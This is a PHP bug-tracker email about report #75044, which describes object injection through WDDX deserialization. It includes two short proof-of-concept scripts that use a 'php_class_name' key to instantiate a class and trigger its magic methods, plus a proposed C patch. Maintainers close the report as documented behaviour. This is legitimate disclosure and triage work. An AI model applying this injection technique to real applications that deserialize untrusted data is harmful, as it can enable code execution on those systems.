Bug #75044 [Opn->Nab]: Object Injection in PHP's WDDX Serialization
| From: | cmb@php.net | Date: | Sat, 05 Dec 2020 16:21:49 +0000 |
| Subject: | Bug #75044 [Opn->Nab]: Object Injection in PHP's WDDX Serialization | ||
| References: | 1 | Groups: | php.bugs |
| Request: | Send a blank email to php-bugs+get-230876@lists.php.net to get a copy of this message | ||
Edit report at https://bugs.php.net/bug.php?id=75044&edit=1
ID: 75044
Updated by: cmb@php.net
Reported by: taoguangchen at icloud dot com
Summary: Object Injection in PHP's WDDX Serialization
-Status: Open
+Status: Not a bug
Type: Bug
Package: WDDX related
Operating System: *
PHP Version: 5.6.31
-Assigned To:
+Assigned To: cmb
Block user comment: N
Private report: N
New Comment:
Actually, this is not even a bug; the behavior is documented and
it is warned against passing untrusted input to that function.
Also, the complete WDDX extension is deprecated and unbundled as
of PHP 7.4.0.
Previous Comments:
------------------------------------------------------------------------
[2017-08-13 19:40:08] cmb@php.net
> it would be basically in the same class as unserialize, with
> same (none) security guarantees as it seems.
Indeed, it is; see <http://news.php.net/php.internals/100183> and
<http://svn.php.net/viewvc?view=revision&revision=342852>.
------------------------------------------------------------------------
[2017-08-07 19:50:44] stas@php.net
The proposed fix doesn't seem to fix anything in fact, as it's changing serialization, not
unserialization, but the question is should we consider this an issue? I.e. if wddx supports live
php objects, it would be basically in the same class as unserialize, with same (none) security
guarantees as it seems.
------------------------------------------------------------------------
[2017-08-07 10:20:14] taoguangchen at icloud dot com
Description:
------------
PoC 1:
```
class ryat {
var $hi;
function __wakeup() {
echo 'hi';
}
function __destruct() {
echo $this->hi;
}
}
$array = ['php_class_name'=>'ryat', 'hi'=>'ryat'];
wddx_deserialize(wddx_serialize_value($array));
```
PoC 2:
```
ini_set('session.serialize_handler', 'wddx');
session_start();
$array = ['php_class_name'=>'ryat', 'hi'=>'ryat'];
$_SESSION['ryat'] = $array;
session_decode(session_encode());
class ryat {
var $hi;
function __wakeup() {
echo 'hi';
}
function __destruct() {
echo $this->hi;
}
}
```
Fix:
```
static void php_wddx_serialize_array(wddx_packet *packet, zval *arr)
{
...
if (is_struct) {
ent_type = zend_hash_get_current_key_ex(target_hash, &key, &key_len, &idx, 0, NULL);
if (ent_type == HASH_KEY_IS_STRING) {
+ if (!strcmp(key, PHP_CLASS_NAME_VAR)) {
+ continue;
+ }
php_wddx_serialize_var(packet, *ent, key, key_len TSRMLS_CC);
```
------------------------------------------------------------------------
--
Edit this bug report at https://bugs.php.net/bug.php?id=75044&edit=1